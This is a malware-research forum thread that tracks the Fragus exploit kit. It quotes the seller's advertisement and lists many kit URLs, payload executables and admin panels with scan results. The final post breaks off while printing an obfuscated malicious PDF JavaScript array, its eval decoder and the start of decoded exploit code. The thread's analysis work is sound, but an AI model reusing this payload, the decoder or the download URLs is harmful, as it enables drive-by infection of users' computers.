Fragus exploit pack

[SysAdMini]

Found at http://vx.eof-project.net/viewtopic.php?pid=1706

Administrator Toolbar:

• Attractive design
• Multilingual interface (Russian, English)
• Administrator Toolbar is protected by the password
• Advanced statistics for browsers (including versions), operating systems, countries, exploits
• Possibility to check urgent summary data without page reloading
• Files are uploadet from Administrator Toolbar
• Possibility to specify name of the file, with which Your EXE will be uploadet into the system
• Possibility to distinguish traffic between Sellers and to keep Seller-by-Seller independent statistics
• Possibility to indicate his own file for each Seller or to upload a random one
• Possibility for each Seller to indicate his own kit from Exploit List, and also for total traffic, what makes possible to shut down exploits, inhibiting browser, for resource, where you can't be found
• Possibility to give Seller a unique link on a separate page with statistics for data verification without authorization
• Possibility both to clean general statistics and for each Seller separately
• Fragus enables to watch over feedbacks of each exploit and to display it easy-to-use way; possibility to feedback on URL has many EXE
• Also Fragus permits you to find quickly link on traffic as in open or encoded (encoded iframe) type for total traffic and for each Seller separately
• All preferences are available right from Administrator Toolbar

System features:

• Exploits imaging of high quality with possibility of checking with the help of ajax whether current exploit infects or not before loadint the next one. This option can be disabled in Administrator Toolbar
• Possibility to edit host on necessary URL after it is done allows not to lose used traffic, and to utilize it pro domo sua. Also you can edit on a separate URL those, who visits exploits pack twice or more
• Complete exploits modularity in th system. Your coder will be able to add them easily
• Zero-written cryptor of exploits doesn't overload browser, but nevertheless protects exploits pack safely from antiviruses
• Cryptor lies in separate file and if you want you can easily add you cryptor
• Patterns of pages on exploits imaging, with the page for those who visits twice,lie separately, disguising as 404 error. And it won't be very difficult for you to edit them so it will suit your own ends
• Patterns of Administrator Toolbar also lies separately, so those who doesn'y like our design can change it easily
• Fragus hides from searchbots, what disables domain detection
• Fragus is highly optimized for operating with massive traffic flows and minimum load on server
• Installation will take less than 2 minutes. You don't have to get into file or edit smth manually. Installation wizard will hepl you

Exploits:

• Mdac, still infects IE6 well enough
• PDF: printf(), collectEmailInfo(), getIcon(). Exploit images only for those, who 100% has vulnerable version of Adobe Acrobat. It is arranged so, it can infect absolutely all browsers where this plugin is installed
• MS DirectShow, large break increment
• MS09-002 - for IE7
• MS Spreadsheet, rather new exploit
• AOL IWinAmp, infects rather nicely, almost like PDF
• MS Snapshot with instantaneous run
• MS COM finish IE6 off, if it doesn't break

Price:
800 USD
Exploits pack is sold with closed source code (IonCube)
Hiding of pack functioning from antiviruses (per Customer) - 30 USD
Zero-written cryptor (per Customer) - 150 USD
Large updates are paid

samples :

First you have to visit show.php. Otherwise you will receive only 404 for exploits and payload

exploits

Code:

fragtopmassage.ru/frag/show.php

flash exploit

Code:

fragtopmassage.ru/frag/swf.swf

pdf exploit

Code:

fragtopmassage.ru/frag/pdf.pdf

payload

Code:

fragtopmassage.ru/frag/load.php?e=3

control panel

Code:

fragtopmassage.ru/frag/admin.php

exploits

Code:

blt.kz/1/show.php

flash exploit

Code:

blt.kz/1/swf.swf

pdf exploit

Code:

blt.kz/1/pdf.pdf

payload

Code:

blt.kz/1/load.php?e=3

control panel

Code:

blt.kz/1/admin.php

Article from EvilFingers
http://evilfingers.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html

[SysAdMini]

http://blog.purewire.com/bid/19509/The-Fragus-Exploit-Kit

[SysAdMini]

Fragus – crimeware in the wild
http://securitybananas.com/?p=134

[paulroyal]

New, seen 2009-09-01; not Google Blacklisted/etc:

Code:

tour6.info/tomer/show.php?s=2f2d557669

[SysAdMini]

I came across 2 Fragus kits with almost undetected payloads.

Remember that you have to download show.php first.

Code:

cloudsregion.info/maner/show.php
cloudsregion.info/maner/load.php?e=2

http://www.virustotal.com/analisis/7ce9571bb83c2d13655b50e0fad2a98f69928e0d79202fa13f51e6e4eab1c1f8-1252397303 1/41

Code:

addvertseense.co.uk/show.php
addvertseense.co.uk/load.php?e=2

http://www.virustotal.com/analisis/26ad34c5afc858ef210493c530214b2162347bccf8e197f37e8b4c73da8900a3-1252397512 3/41
http://www.threatexpert.com/report.aspx?md5=85050c8c96a3d35b1ce981f7632c15b9

downloads

Code:

zstudio1.cn/v3/system/msvcr80.dll

http://www.virustotal.comanalisis/02bdde38e4c6bd795a092d496b8d6060cdbe71e22ef4d7a204e3050c1be44fa9-1252399791 0/41

[Malware-Web-Threats]

Code:

geroyvoin.cn/1/show.php?s=747bbfed51
geroyvoin.cn/1/cosx.ipg
geroyvoin.cn/1/manual.swf
geroyvoin.cn/1/cegmoprwx.pdf
geroyvoin.cn/1/jpy5.exe
geroyvoin.cn/1/bgmnrsyz3.exe
geroyvoin.cn/1/dprtz3.exe
geroyvoin.cn/1/dfpquz3.exe
geroyvoin.cn/1/degjt3.exe
geroyvoin.cn/1/bdflu3.exe
geroyvoin.cn/1/dfwx3.exe
geroyvoin.cn/1/admin.php

Wepawet
VirusTotal - 4/41 (9.76%)

[Malware-Web-Threats]

213.163.84.28

Code:

sockslab.net/2/admin.php

[Malware-Web-Threats]

Code:

dmitrygaiduk.cn/show.php?s=1893da9ce4
dmitrygaiduk.cn/dgn.ipg
dmitrygaiduk.cn/adhlorvy.pdf
dmitrygaiduk.cn/bcluwy5.exe
dmitrygaiduk.cn/bgjmpqy2.exe
dmitrygaiduk.cn/cfku3.exe
dmitrygaiduk.cn/cjkosuwxy3.exe
dmitrygaiduk.cn/dfhjnwx3.exe
dmitrygaiduk.cn/dkmps3.exe
dmitrygaiduk.cn/hosuvwxz3.exe
dmitrygaiduk.cn/ilmry3.exe
dmitrygaiduk.cn/admin.php

Wepawet
VirusTotal - 2/41 (4.88%)

McAfee-GW-Edition: Heuristic.LooksLike.Win32.Suspicious.H!87
Panda: Suspicious file

[SysAdMini]

Fragus has been modified. It doesn't use static filenames for pdf exploits and payloads any longer.
Payloads are only downloadable for limited amount of time (some minutes).

All Fragus kits which we have seen before have used pdf.pdf for the pdf file, swf.swf for the Flash and
load.php for the payload. Now the filenames for the pdf file and the payload change randomly and at each request.
The name of the Flash file seems to be always manual.swf.
 

For examples look at the last postings of this thread

or see this one here:

I have checked hxxp://git77.biz/peg/show.php?s=ccc648c6ef multiple times.

Here are 2 results.
http://wepawet.cs.ucsb.edu/view.php?hash=6223f79cf6f195fc5589e50f8544bbbc&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=a06d6231dfc563f09b4f2f4b4892605b&type=js

[Malware-Web-Threats]

can't find the correct path the these domains - seems to be related

Code:

gat77.biz
bot77.biz

http://www.bfk.de/bfk_dnslogger.html?query=91.212.198.3
http://www.malwaredomainlist.com/mdl.php?search=91.212.198.3&colsearch=All&quantity=50&inactive=on

[SysAdMini]

can't find the correct path the these domains - seems to be related

Code:

gat77.biz
bot77.biz

Haven't found the path, but one of our readers at Twitter sent me message that all 77.biz domains use the new version.
I guess those 2 domains are related.

[SysAdMini]

old format

Code:

bobunium.com/fr2/show.php?s=f801ff8253

new format

Code:

americaregion.info/born/show.php?s=dd6d6bb56c
busergondermags.com/f2hubba/show.php?s=019c9537bc
fartunaall.ru/task/show.php?s=e7e53d546c

[Malware-Web-Threats]

Code:

got77.biz/peg/show.php?s=75dbfbfc1f
got77.biz/peg/chlnquxyz.pdf
got77.biz/peg/aeimnstxz3.exe
got77.biz/peg/chknz3.exe
got77.biz/peg/egijkmtx3.exe
got77.biz/peg/gjklmnrsy5.exe
got77.biz/peg/hwx3.exe
got77.biz/peg/inz3.exe
got77.biz/peg/mnqv2.exe
got77.biz/peg/optwx3.exe
got77.biz/peg/admin.php (control panel)

Wepawet

[WIEx]

Malware-Web-Threats )

PDF file filter in first section: ASCII85Decode, FlateDecode

Code:

var fra=[205,190,196,198,206,207,211,213,105,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,225,219,207,178,194,200,130,223,197,217,188,198,145,198,203,210,206,189,190,141,140,162,208,204,183,127,222,211,199,214,218,185,129,160,211,199,214,218,185,145,224,100,223,197,217,188,198,160,211,199,214,218,185,132,214,207,200,215,219,187,191,209,193,142,148,147,181,187,209,137,152,141,162,187,187,215,207,216,210,135,194,183,213,205,214,159,228,83,188,216,200,201,216,208,184,196,131,207,218,205,211,168,198,213,195,212,216,205,113,127,222,208,199,214,135,185,183,220,198,213,197,203,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,139,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,138,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,158,121,140,167,127,219,155,155,128,136,136,207,153,151,158,128,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,210,214,185,147,216,200,203,215,202,170,198,200,130,136,137,220,121,151,147,155,139,217,151,138,134,164,127,219,148,168,121,151,136,207,150,165,151,138,120,140,100,220,197,217,105,190,200,187,214,198,211,184,185,206,151,212,211,215,116,198,196,211,210,211,200,173,145,217,187,216,132,201,178,189,197,198,213,199,210,134,203,209,191,217,199,200,185,187,139,124,139,217,151,138,134,164,127,219,148,168,121,151,133,131,161,218,200,187,118,203,191,199,200,204,187,201,204,212,203,161,153,121,145,217,187,216,132,218,185,200,196,211,163,204,204,170,186,200,204,217,205,225,174,129,203,191,199,212,201,181,197,198,197,148,208,204,183,189,215,194,161,219,207,178,194,200,130,200,205,206,171,194,210,189,209,146,211,174,196,202,206,206,160,218,185,200,196,211,143,223,201,178,189,197,198,213,199,210,116,147,197,195,205,198,211,184,185,206,149,227,110,221,170,200,131,192,207,208,211,171,194,210,189,209,161,201,178,189,197,198,213,199,210,119,201,216,188,217,216,217,178,196,202,130,150,144,218,185,200,196,211,143,159,221,170,200,131,188,210,211,202,180,147,197,195,205,198,211,184,185,206,136,217,217,201,188,202,213,195,212,203,143,121,130,197,195,205,198,211,184,185,206,136,210,201,213,176,202,203,135,217,212,217,170,207,140,149,221,204,208,181,187,139,188,210,211,202,180,132,207,191,212,203,219,177,129,214,202,216,197,224,133,134,219,142,150,148,151,121,127,222,188,210,211,202,180,147,197,198,213,199,210,116,184,207,201,201,207,146,175,191,207,198,200,208,214,172,193,158,215,112,218,200,187,118,208,191,211,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,127,158,192,213,214,143,191,183,213,122,207,161,151,132,191,159,139,154,148,151,132,191,142,133,143,223,212,174,195,194,187,216,214,200,194,177,204,183,163,198,211,184,185,206,133,206,201,200,185,184,207,201,201,207,162,198,96,217,187,216,132,213,190,195,160,139,152,157,160,130,143,156,147,159,157,160,130,143,156,147,159,157,160,130,143,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,156,159,129,142,155,146,158,159,220,189,191,207,136,214,214,208,183,202,201,130,136,137,155,126,134,147,138,204,134,147,183,203,208,131,161,225,113,175,203,209,189,218,205,214,183,118,198,201,210,208,200,171,181,200,199,199,205,211,113,127,222,208,199,214,135,188,190,200,198,210,199,214,173,187,160,207,212,201,218,172,183,211,191,142,134,140,190,140,151,147,150,137,220,122,142,164,139,139,217,151,121,134,147,127,219,156,169,121,134,136,207,153,148,155,121,123,216,142,150,156,169,110,203,155,156,155,152,140,190,134,151,142,150,137,220,125,134,155,156,139,217,159,139,134,151,127,219,148,155,125,134,136,207,152,148,151,141,123,216,140,150,148,151,110,203,150,158,150,148,140,190,134,147,145,169,137,220,121,134,154,145,139,217,151,122,141,151,127,219,151,154,140,137,136,207,156,152,170,121,123,216,142,150,156,169,110,203,154,146,153,148,140,190,142,165,138,169,137,220,121,153,151,138,139,217,158,121,142,165,127,219,165,171,122,153,136,207,155,156,159,139,123,216,159,168,148,159,110,203,155,156,150,157,140,190,137,151,142,150,137,220,125,134,155,158,139,217,159,139,141,166,127,219,151,170,126,142,136,207,154,152,157,138,123,216,158,151,153,168,110,203,149,156,171,150,140,190,142,165,159,152,137,220,142,152,168,157,139,217,156,138,138,169,127,219,156,154,126,136,136,207,155,154,172,138,123,216,143,155,156,160,110,203,152,144,150,152,140,190,142,165,143,157,137,220,124,153,154,141,139,217,158,125,142,165,127,219,155,159,124,137,136,207,172,151,151,124,123,216,146,168,153,157,110,203,149,138,157,154,140,190,156,150,138,153,137,220,140,143,150,141,139,217,156,121,138,156,127,219,165,171,125,135,136,207,172,170,154,124,123,216,138,172,151,157,110,203,148,142,168,169,140,190,137,155,138,153,137,220,128,138,169,140,139,217,170,122,134,155,127,219,148,171,140,156,136,207,172,165,151,124,123,216,159,168,152,151,110,203,152,146,171,170,140,190,156,155,141,168,137,220,142,139,154,143,139,217,159,139,139,168,127,219,150,155,125,140,136,207,169,151,151,124,123,216,146,168,154,157,110,203,151,146,150,167,140,190,139,153,146,168,137,220,121,137,148,157,139,217,159,139,154,150,127,219,156,168,121,138,136,207,169,151,151,124,123,216,143,171,153,173,110,203,166,141,155,148,140,190,141,167,146,170,137,220,126,141,147,146,139,217,169,129,139,149,127,219,167,168,124,137,136,207,155,166,159,138,123,216,155,152,169,159,110,203,169,160,172,170,140,190,137,149,160,172,137,220,129,152,166,138,139,217,173,123,156,154,127,219,152,173,138,155,136,207,157,153,169,129,123,216,144,155,150,172,110,203,164,156,157,156,140,190,143,155,144,156,137,220,138,152,153,144,139,217,170,121,137,150,127,219,154,152,139,142,136,207,150,148,157,125,123,216,143,150,148,151,110,203,152,142,156,156,140,190,141,149,144,158,137,220,124,139,153,143,139,217,152,140,136,151,127,219,155,155,127,143,136,207,155,152,156,121,123,216,156,158,153,154,110,203,169,157,167,165,140,190,141,166,138,170,137,220,126,139,169,160,139,217,159,139,134,151,127,219,156,154,143,142,136,207,150,167,170,125,123,216,144,169,166,151,110,203,168,138,158,165,140,190,139,147,147,158,137,220,127,156,153,146,139,217,153,142,140,168,127,219,154,159,127,138,136,207,157,150,158,126,123,216,144,170,154,170,110,203,165,146,155,152,140,190,138,168,146,171,137,220,142,153,147,159,139,217,156,126,156,169,127,219,157,154,121,138,136,207,153,151,156,121,123,216,143,150,167,151,110,203,152,144,155,148,140,190,139,152,146,168,137,220,129,137,147,142,139,217,158,143,153,149,127,219,167,153,129,137,136,207,155,150,155,140,123,216,156,158,153,151,110,203,148,155,153,154,140,190,141,147,140,172,137,220,126,139,169,160,139,217,156,139,134,151,127,219,153,157,126,141,136,207,159,156,169,129,123,216,146,167,170,172,110,203,169,160,150,169,140,190,134,151,143,155,137,220,121,134,153,155,139,217,171,128,156,169,127,219,155,155,127,142,136,207,157,148,158,125,123,216,140,172,151,168,110,203,153,145,152,170,140,190,141,151,144,172,137,220,124,141,150,145,139,217,157,123,136,168,127,219,155,168,127,143,136,207,157,148,153,143,123,216,144,157,154,156,110,203,153,140,152,170,140,190,140,156,144,153,137,220,128,135,153,160,139,217,158,138,141,155,127,219,150,172,124,137,136,207,157,156,157,126,123,216,138,150,154,156,107,127,158,208,199,214,135,182,187,208,185,199,214,217,170,207,160,200,203,219,135,138,200,213,187,223,140,144,132,204,196,204,134,199,202,134,134,219,138,201,148,202,121,185,147,189,161,218,200,187,118,196,190,202,214,164,121,206,151,138,150,148,151,121,145,217,187,216,132,218,172,181,207,191,212,161,218,177,187,207,198,201,211,203,174,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,197,203,173,200,144,130,217,199,198,181,187,209,133,150,220,154,129,127,158,208,199,214,135,194,183,213,205,214,161,220,183,187,214,189,199,212,204,113,120,136,207,159,148,160,121,123,216,147,150,157,151,107,127,158,211,199,214,218,185,147,201,195,222,195,208,189,126,220,187,216,215,215,117,194,200,200,143,159,221,170,200,131,189,213,217,213,189,136,160,130,201,199,148,121,206,151,138,150,148,151,121,127,146,187,202,200,217,132,188,210,204,142,218,200,187,118,198,201,219,210,219,134,134,158,189,213,217,213,189,146,198,201,219,210,219,123,145,198,201,219,210,219,116,129,140,213,211,201,212,168,183,213,204,199,221,194,172,197,216,200,218,193,164,194,183,213,205,214,143,218,177,187,207,198,201,211,203,174,145,224,100,220,197,217,105,197,217,191,216,202,211,184,205,160,207,212,201,218,172,183,211,191,142,134,140,190,134,198,138,201,137,220,121,185,147,189,136,141,162,192,190,204,198,203,140,214,191,187,213,192,210,211,222,119,194,200,200,205,216,207,133,138,151,147,155,150,144,196,197,217,191,216,202,211,184,205,142,151,213,218,204,187,188,207,201,221,159,228,83,202,203,195,217,146,202,184,194,207,187,200,183,219,184,200,200,151,169,211,211,181,183,197,136,201,211,211,181,187,198,206,171,209,200,178,194,172,200,204,211,143,196,201,216,188,208,158,137,107,130,208,205,205,158,214,191,187,213,192,210,211,222,198,127,158,215,112,202,220,183,185,215,195,213,210,135,172,197,207,198,199,198,198,176,187,215,195,201,211,213,113,127,222,195,204,140,200,185,198,145,190,213,199,149,140,197,207,198,199,198,149,176,187,215,163,201,211,213,114,209,217,187,216,132,200,187,200,220,151,212,201,222,105,151,213,204,199,221,143,114,145,217,187,216,132,221,191,198,200,206,206,221,200,134,203,209,191,217,199,200,185,187,139,124,139,217,157,125,143,147,127,219,149,159,138,135,136,207,150,148,151,121,123,216,146,168,148,151,110,203,150,138,154,148,140,190,138,147,146,168,137,220,129,152,152,142,139,217,151,125,138,147,127,219,152,151,129,152,136,207,158,166,151,125,123,216,138,154,152,151,110,203,149,138,150,168,140,190,136,147,138,150,137,220,124,154,147,138,139,217,151,121,141,166,127,219,148,151,128,141,136,207,150,149,158,125,123,216,141,153,167,154,110,203,153,142,169,148,140,190,138,147,146,168,137,220,128,142,150,138,139,217,159,139,134,166,127,219,148,170,125,134,136,207,157,148,159,139,123,216,155,170,149,170,110,203,152,146,158,166,140,190,155,165,138,158,137,220,129,152,147,147,139,217,154,125,138,147,127,219,152,151,129,154,136,207,158,166,158,140,123,216,141,169,153,159,110,203,151,142,156,165,140,190,154,148,143,167,137,220,123,152,168,140,139,217,159,139,155,149,127,219,169,169,142,153,136,207,155,165,155,143,123,216,146,153,153,153,110,203,152,144,171,165,140,190,139,152,146,159,137,220,126,140,147,142,139,217,159,139,139,154,127,219,151,170,128,137,136,207,157,152,159,139,123,216,145,158,151,154,110,203,169,141,150,151,140,190,142,165,143,156,137,220,123,134,154,144,139,217,173,124,134,150,127,219,167,160,124,137,136,207,155,148,155,130,123,216,155,170,152,152,110,203,169,160,153,151,140,190,134,169,141,156,137,220,122,138,165,159,139,217,154,129,134,150,127,219,155,155,143,136,136,207,169,149,151,129,123,216,138,170,167,173,110,203,169,155,150,151,140,190,155,165,142,150,137,220,126,142,168,160,139,217,173,129,137,165,127,219,169,156,128,139,136,207,158,166,156,142,123,216,140,154,152,157,110,203,166,141,150,151,140,190,142,165,144,156,137,220,125,142,147,157,139,217,156,127,142,165,127,219,148,154,122,153,136,207,158,166,171,124,123,216,146,167,148,155,110,203,166,141,150,151,140,190,139,168,143,172,137,220,140,137,152,138,139,217,158,141,142,167,127,219,153,158,121,142,136,207,168,156,156,123,123,216,157,167,151,154,110,203,152,156,158,165,140,190,151,149,159,158,137,220,143,156,169,160,139,217,154,123,156,169,127,219,156,169,140,134,136,207,172,150,173,128,123,216,142,172,165,172,110,203,154,143,168,156,140,190,140,152,140,171,137,220,138,152,154,146,139,217,160,129,140,153,127,219,165,169,127,140,136,207,169,148,154,124,123,216,144,151,166,159,110,203,147,138,156,152,140,190,139,147,138,150,137,220,126,138,153,146,139,217,158,123,140,155,127,219,151,156,127,139,136,207,151,167,153,125,123,216,145,154,154,160,110,203,152,142,155,148,140,190,152,155,143,153,137,220,143,153,164,155,139,217,158,140,134,167,127,219,153,156,143,156,136,207,158,166,151,125,123,216,146,153,170,159,110,203,147,157,169,152,140,190,140,166,156,150,137,220,142,134,155,155,139,217,156,121,143,155,127,219,154,173,127,142,136,207,152,169,157,142,123,216,144,158,154,155,110,203,154,140,157,153,140,190,140,167,144,169,137,220,139,142,152,142,139,217,155,142,142,168,127,219,169,170,121,155,136,207,155,153,173,143,123,216,147,153,148,155,110,203,150,141,155,148,140,190,139,147,157,150,137,220,126,140,152,138,139,217,156,126,142,165,127,219,156,154,121,138,136,207,157,170,170,123,123,216,157,152,156,154,110,203,152,140,154,167,140,190,152,155,143,150,137,220,122,151,150,144,139,217,158,121,136,169,127,219,153,156,143,156,136,207,155,166,151,125,123,216,143,156,153,158,110,203,156,146,168,156,140,190,142,164,160,171,137,220,143,156,147,159,139,217,151,125,139,152,127,219,148,151,127,151,136,207,170,155,173,143,123,216,145,154,154,159,110,203,154,138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,157,138,140,154,127,219,154,172,127,153,136,207,153,151,158,124,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,204,190,186,139,147,138,169,178,164,191,204,211,191,218,204,224,170,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,148,223,125,134,147,138,150,148,148,113,190,186,203,155,148,151,140,164,142,138,222,151,159,114,145,217,187,216,132,224,170,200,214,202,163,217,213,174,201,198,187,214,201,143,107,123,216,147,150,157,151,110,203,156,138,159,148,137,114,145,220,187,216,215,215,134,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,161,218,200,187,118,211,143,167,206,178,127,139,201,151,142,148,223,121,185,147,189,150,199,151,172,131,147,210,154,148,151,121,134,147,131,149,148,223,125,134,147,138,150,148,162,175,197,213,130,220,197,217,105,204,212,189,183,168,160,127,207,160,138,161,218,216,172,167,167,147,156,221,163,185,139,164,196,177,154,156,175,145,217,203,201,181,171,130,140,220,133,145,141,226,170,200,213,211,193,218,216,172,167,167,147,156,221,196,134,207,196,204,217,212,146,191,204,211,191,218,204,224,170,145,224,100,220,197,217,105,202,184,167,206,178,201,144,205,160,207,212,201,218,172,183,211,191,142,134,140,121,143,133,131,161,219,207,178,194,200,130,218,185,180,177,164,197,161,221,146,211,174,196,202,206,206,160,151,193,138,147,138,150,141,226,189,171,176,194,180,198,174,192,129,160,206,187,177,207,151,184,170,209,161,225,113,189,171,176,194,180,198,174,192,147,133,168,148,134,146,189,171,176,194,180,198,174,192,145,196,202,214,146,203,184,185,145,157,213,208,211,170,184,145,193,203,216,176,172,197,209,130,218,185,180,177,164,197,161,221,141,162,198,211,109,192,219,210,202,189,191,210,200,134,212,203,175,181,214,206,199,214,219,113,127,222,208,199,214,135,191,187,213,205,207,211,213,134,183,211,202,148,218,208,174,205,200,204,188,201,217,188,191,210,200,148,216,214,156,202,213,195,212,203,143,114,145,217,191,216,215,208,184,196,160,208,203,214,218,178,197,209,136,216,201,215,181,183,198,191,142,147,195,141,133,202,134,141,139,144,132,204,196,204,134,218,200,187,201,204,201,212,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,204,200,204,217,205,214,183,132,198,194,199,214,168,189,126,147,131,146,218,204,187,201,204,201,212,146,202,177,183,213,155,218,140,152,114,130,217,191,216,215,208,184,196,145,189,206,197,217,138,202,139,140,143,141,162,178,188,139,130,220,197,217,188,191,210,200,197,197,217,187,183,220,181,150,193,164,134,142,140,128,140,140,221,170,200,214,195,213,210,198,170,200,213,187,223,191,152,166,147,160,138,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,151,163,149,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,136,192,150,153,141,144,196,203,215,195,210,195,215,187,191,209,206,204,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,146,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,156,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,152,138,141,191,183,213,205,207,211,213,168,183,213,204,199,221,194,123,179,159,140,143,141,226,172,197,207,198,199,198,198,174,195,196,195,210,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,147,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,157,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,151,141,144,196,185,210,198,210,197,201,168,189,200,206,207,199,214,183,126,140,149,227,225,113,185,186,201,185,217,216,200,187,202,139,131,161];

2 section FlateDecode

Code:

for (var amnsx=0, fioqtu='';amnsx<5298;amnsx++){fioqtu += String.fromCharCode(fra[amnsx]-'gIVcZfd'.substring(amnsx%'gIVcZfd'.length,amnsx%'gIVcZfd'.length+1).charCodeAt(0));}eval(fioqtu);

output variant:

Code:

function fix_it(yarsp, len)
{
    while (yarsp.length * 2 < len) {
        yarsp += yarsp;
    }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}
function util_printf()
{
